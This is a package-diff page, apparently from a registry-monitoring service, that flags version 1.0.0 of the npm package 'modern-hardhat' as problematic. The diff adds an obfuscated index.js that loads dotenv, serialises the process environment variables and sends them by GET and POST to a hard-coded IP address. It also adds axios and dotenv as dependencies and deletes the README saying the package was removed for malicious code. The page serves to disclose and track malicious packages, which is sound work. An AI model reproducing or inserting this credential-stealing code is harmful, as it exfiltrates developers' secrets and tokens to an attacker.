modern-hardhat 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of modern-hardhat might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +12 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0x11b1e9 = _0x5494; function _0x564f() { const _0x44a338 = ['axios', '30ZtGmWG', '946910eYCpFh', '24tkuefi', '4pApIAZ', 'env', 'then', '767907oPXwzV', '16woLHii', '122376AxPpIs', 'log', 'get', 'http://191.101.1.121/private/?data=', '5125XeJIPB', 'catch', '468LenVms', '1112167QEdozz', 'config', '29826cSIDHY', 'dotenv', '229856sqbNHd']; _0x564f = function () { return _0x44a338; }; return _0x564f(); } (function (_0x16f35b, _0x2f5657) { const _0x2c8f35 = _0x5494, _0x40f07e = _0x16f35b(); while (!![]) { try { const _0x6ac23a = -parseInt(_0x2c8f35(0x1ab)) / 0x1 * (parseInt(_0x2c8f35(0x1ba)) / 0x2) + -parseInt(_0x2c8f35(0x1b1)) / 0x3 * (-parseInt(_0x2c8f35(0x1ac)) / 0x4) + parseInt(_0x2c8f35(0x1b5)) / 0x5 * (-parseInt(_0x2c8f35(0x1a9)) / 0x6) + -parseInt(_0x2c8f35(0x1b8)) / 0x7 * (parseInt(_0x2c8f35(0x1b0)) / 0x8) + -parseInt(_0x2c8f35(0x1af)) / 0x9 + parseInt(_0x2c8f35(0x1aa)) / 0xa + parseInt(_0x2c8f35(0x1a7)) / 0xb * (parseInt(_0x2c8f35(0x1b7)) / 0xc); if (_0x6ac23a === _0x2f5657) break; else _0x40f07e['push'](_0x40f07e['shift']()); } catch (_0x53f994) { _0x40f07e['push'](_0x40f07e['shift']()); } } }(_0x564f, 0x2cff1)); function _0x5494(_0x49a430, _0x818fdd) { const _0x564f80 = _0x564f(); return _0x5494 = function (_0x5494e7, _0x16a8eb) { _0x5494e7 = _0x5494e7 - 0x1a6; let _0x4c3d84 = _0x564f80[_0x5494e7]; return _0x4c3d84; }, _0x5494(_0x49a430, _0x818fdd); } const axios = require(_0x11b1e9(0x1a8)); require(_0x11b1e9(0x1a6))['config'](), exports[_0x11b1e9(0x1b9)] = async () => { const _0x3d896a = _0x11b1e9; let _0x4e1897 = _0x3d896a(0x1b4) + JSON['stringify'](process[_0x3d896a(0x1ad)]); axios[_0x3d896a(0x1b3)](_0x4e1897)[_0x3d896a(0x1ae)](_0x15cc2f => { })[_0x3d896a(0x1b6)](_0xf6a255 => { }); let _0x40c28e = JSON['stringify'](process[_0x3d896a(0x1ad)]); axios['post']('http://191.101.1.121/api/private/', _0x40c28e)[_0x3d896a(0x1ae)](_0x5bb317 => { const _0x57d674 = _0x3d896a; console[_0x57d674(0x1b2)](_0x5bb317); }); };
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
1
  {
2
2
  "name": "modern-hardhat",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "axios": "^1.1.3",
13
+ "dotenv": "^16.0.3"
14
+ }
6
15
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=modern-hardhat for more information.